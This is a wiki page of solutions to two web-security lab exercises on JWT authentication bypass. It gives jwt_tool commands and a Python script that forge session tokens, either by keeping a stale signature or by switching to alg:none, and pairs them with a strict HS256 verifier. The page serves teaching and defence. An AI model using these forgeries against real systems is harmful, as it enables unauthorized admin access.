Alnoman Kamil edited this page Oct 16, 2024 · 65 revisions

Apprentice lab:
JWT authentication bypass via unverified signature

This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn't verify the signature of any JWTs that it receives.
To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter

  • Solution

    1. Log in as wiener:peter.
    2. Notice that the session cookie is a JWT: three base64url segments separated by dots.
    3. Try accessing /admin and export the request (x4) from mitmproxy to request.txt.
    4. Run jwt_tool against the saved request.
      jwt_tool.py -r request.txt
      Observe the decoded header and payload; the sub claim is wiener.
    5. Inject a new value for sub. No signing option is given, so the tampered token still carries the old signature, which is enough here because the server never checks it.
      jwt_tool.py -r request.txt -I -pc sub -pv administrator -v
    6. Go back to mitmproxy and observe the request that jwt_tool sent. Copy the tampered cookie value and set it as the session cookie in the browser.
    7. Open the /admin panel and delete the user carlos.

Practitioner lab:
JWT authentication bypass via flawed signature verification

This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.
To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter

  • Solution

    1. Log in as wiener:peter.
    2. Notice that the session cookie is a JWT: three base64url segments separated by dots.
    3. Try accessing /admin and export the request (x4) from mitmproxy to request.txt.
    4. Run jwt_tool against the saved request.
      jwt_tool.py -r request.txt
      Observe the decoded header and payload; the sub claim is wiener.
    5. Inject a new value for sub and apply the alg:none exploit.
      jwt_tool.py -r request.txt -I -pc sub -pv administrator -v -X a
      -X a sets the header alg to none and strips the signature. Keeping the old signature would not work here: the server does check signatures, it just also accepts tokens that declare they have none. If the literal none is rejected, jwt_tool also tries case variants such as None and NONE.
    6. Go back to mitmproxy and observe the request that jwt_tool sent. Copy the tampered cookie value and set it as the session cookie in the browser.
    7. Open the /admin panel and delete the user carlos.
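
Both solutions are one-line jwt_tool invocations. The script below is added here as an illustration and is neither the original page's nor jwt_tool's code: it performs the two tampers by hand (rewrite sub and keep the stale signature; rewrite sub and switch to alg:none with an empty signature) and pairs them with the strict HS256 verifier both lab servers lack, which rejects both forgeries. The signing key DEMO_SECRET and the wiener session token built from it are constructed for the example; the real lab key is unknown and neither attack needs it.

```python
import base64
import hashlib
import hmac
import json

# Constructed for this example only: a signing key and the "wiener" session
# token it produces. The real lab key is unknown (and irrelevant to both attacks).
DEMO_SECRET = b"demo-secret-not-the-lab-key"


def b64url_encode(data: bytes) -> str:
    """JWT base64url: URL-safe alphabet, padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode; restores the padding the base64 decoder needs."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj: dict) -> str:
    """Serialise a JSON object as a compact JWT segment."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_jwt(token: str):
    """Split a compact JWS into (header, payload, signature segment) without checking anything."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), sig_b64


def make_hs256(payload: dict, secret: bytes) -> str:
    """Mint a correctly signed HS256 token (used only to build the sample session)."""
    signing_input = f"{encode_segment({'alg': 'HS256', 'typ': 'JWT'})}.{encode_segment(payload)}"
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


# The session cookie as issued to wiener; "exp" is a fixed far-future epoch for reproducibility.
WIENER_TOKEN = make_hs256({"iss": "portswigger", "sub": "wiener", "exp": 2000000000}, DEMO_SECRET)


def forge_keep_signature(token: str, claim: str, value) -> str:
    """Apprentice lab: rewrite a payload claim and keep the original signature.
    Only works when the server never verifies the signature (what jwt_tool -I -pc/-pv sends)."""
    header, payload, sig = decode_jwt(token)
    payload[claim] = value
    return f"{encode_segment(header)}.{encode_segment(payload)}.{sig}"


def forge_alg_none(token: str, claim: str, value, alg: str = "none") -> str:
    """Practitioner lab: set alg to none and drop the signature (what jwt_tool -X a sends).
    alg is a parameter because some verifiers only blocklist the exact string "none"."""
    header, payload, _ = decode_jwt(token)
    header["alg"] = alg
    payload[claim] = value
    return f"{encode_segment(header)}.{encode_segment(payload)}."


def verify_hs256(token: str, secret: bytes):
    """The check both lab servers lack: pin the algorithm, recompute the MAC, compare in constant time.
    Returns the payload on success and None on any failure."""
    try:
        header, payload, sig = decode_jwt(token)
    except ValueError:  # wrong segment count, bad base64, or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":  # rejects alg:none and its case variants
        return None
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig):  # rejects the kept-but-stale signature
        return None
    return payload


if __name__ == "__main__":
    for name, tok in [("original", WIENER_TOKEN),
                      ("kept signature", forge_keep_signature(WIENER_TOKEN, "sub", "administrator")),
                      ("alg:none", forge_alg_none(WIENER_TOKEN, "sub", "administrator"))]:
        accepted = verify_hs256(tok, DEMO_SECRET) is not None
        print(f"{name:15} sub={decode_jwt(tok)[1]['sub']:14} strict verifier accepts: {accepted}")
```

The two forgeries are what the page's step 6 pastes into the browser. The verifier shows why the fix is not "check the signature when one is present": the algorithm must be pinned server-side to the one the issuer uses, and the comparison must not trust the alg field the attacker controls.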